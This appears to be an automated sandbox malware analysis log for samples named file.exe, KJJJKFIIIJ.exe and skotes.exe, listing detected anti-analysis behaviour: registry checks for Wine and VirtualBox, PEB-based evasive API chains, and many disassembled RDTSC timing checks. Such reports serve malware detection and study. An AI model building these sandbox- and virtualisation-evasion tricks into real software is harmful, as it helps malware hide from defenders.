Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774389 second address: 7743A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B38 second address: 779B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B3C second address: 779B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B4B second address: 779B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B60 second address: 779B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779B66 second address: 779B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 779E25 second address: 779E37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A0D6 second address: 77A0E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF0EC6B64CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A0E6 second address: 77A11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a js 00007FF0EC517C7Ch 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC517C84h 0x00000019 jnc 00007FF0EC517C76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A11A second address: 77A11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77A11E second address: 77A132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF0EC517C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C98D second address: 77C993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C993 second address: 77C997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CA85 second address: 77CA8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CADA second address: 77CAE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CAE4 second address: 77CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007FF0EC6B64E0h 0x0000000d push ebx 0x0000000e jmp 00007FF0EC6B64D8h 0x00000013 pop ebx 0x00000014 nop 0x00000015 jmp 00007FF0EC6B64D9h 0x0000001a push 00000000h 0x0000001c push E0E95076h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FF0EC6B64D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB47 second address: 77CB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB4C second address: 77CB51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CB51 second address: 77CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 1F16B00Ah 0x0000000e mov edx, dword ptr [ebp+122D1C72h] 0x00000014 push 00000003h 0x00000016 mov cx, 90D0h 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2BDCh], edx 0x00000022 push 00000003h 0x00000024 call 00007FF0EC517C79h 0x00000029 jmp 00007FF0EC517C7Bh 0x0000002e push eax 0x0000002f push eax 0x00000030 push eax 0x00000031 push eax 0x00000032 pop eax 0x00000033 pop eax 0x00000034 pop eax 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push esi 0x0000003a jmp 00007FF0EC517C89h 0x0000003f pop esi 0x00000040 mov eax, dword ptr [eax] 0x00000042 jc 00007FF0EC517C82h 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c jmp 00007FF0EC517C7Eh 0x00000051 pop eax 0x00000052 mov dword ptr [ebp+122D2488h], edx 0x00000058 lea ebx, dword ptr [ebp+12460792h] 0x0000005e pushad 0x0000005f call 00007FF0EC517C7Ch 0x00000064 movsx ecx, bx 0x00000067 pop ebx 0x00000068 popad 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FF0EC517C89h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CC12 second address: 77CC29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDE7 second address: 78DDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDEB second address: 78DE12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC6B64D1h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jc 00007FF0EC6B64C6h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D844 second address: 79D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B7BE second address: 79B7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B93D second address: 79B943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BDB1 second address: 79BDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79BDBE second address: 79BDE0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC517C80h 0x00000011 jp 00007FF0EC517C76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C215 second address: 79C21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C21B second address: 79C21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C21F second address: 79C25E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC6B64DEh 0x00000008 jmp 00007FF0EC6B64D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FF0EC6B64D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C25E second address: 79C264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C264 second address: 79C268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C3BE second address: 79C3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF0EC517C7Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C523 second address: 79C541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF0EC6B64CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C807 second address: 79C81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792248 second address: 792269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D5h 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF0EC6B64C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D367 second address: 79D371 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D371 second address: 79D377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D377 second address: 79D381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2FE2 second address: 7A3004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D1h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3004 second address: 7A3014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3014 second address: 7A3023 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64CAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3023 second address: 7A3029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5693 second address: 7A5697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A5697 second address: 7A569D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A569D second address: 7A56A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76D960 second address: 76D97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76D97A second address: 76D996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA133 second address: 7AA137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA137 second address: 7AA151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CAh 0x00000007 jno 00007FF0EC6B64C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA151 second address: 7AA155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA155 second address: 7AA159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA159 second address: 7AA169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC517C76h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA169 second address: 7AA173 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA173 second address: 7AA17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA17D second address: 7AA181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AA5A7 second address: 7AA5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC74D second address: 7AC753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC753 second address: 7AC757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC8BA second address: 7AC8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC9D6 second address: 7AC9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ACAB6 second address: 7ACABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC21 second address: 7ADC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC25 second address: 7ADC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ADC2F second address: 7ADC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AED97 second address: 7AED9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AE5D4 second address: 7AE5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AED9D second address: 7AEE18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edi, 77530AC2h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FF0EC6B64C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D249Bh], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF0EC6B64C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov esi, dword ptr [ebp+122D3B52h] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 jmp 00007FF0EC6B64CBh 0x0000005e pop edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0336 second address: 7B034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF0EC517C76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B034D second address: 7B03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF0EC6B64C8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub esi, dword ptr [ebp+122D3D5Ah] 0x0000002c mov edi, dword ptr [ebp+122D3B82h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FF0EC6B64C8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e mov edi, 0ADCB494h 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 jg 00007FF0EC6B64C8h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03C9 second address: 7B03CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03CD second address: 7B03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03D1 second address: 7B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0E4E second address: 7B0EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF0EC6B64C6h 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 mov esi, dword ptr [ebp+122D378Dh] 0x00000019 push 00000000h 0x0000001b add esi, 4BC81A00h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FF0EC6B64C8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov di, D61Fh 0x00000041 mov edi, dword ptr [ebp+122D3BDAh] 0x00000047 xchg eax, ebx 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FF0EC6B64CBh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0EAD second address: 7B0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF0EC517C82h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0BCA second address: 7B0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0EC8 second address: 7B0ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0BD7 second address: 7B0BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0ECE second address: 7B0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0ED2 second address: 7B0ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
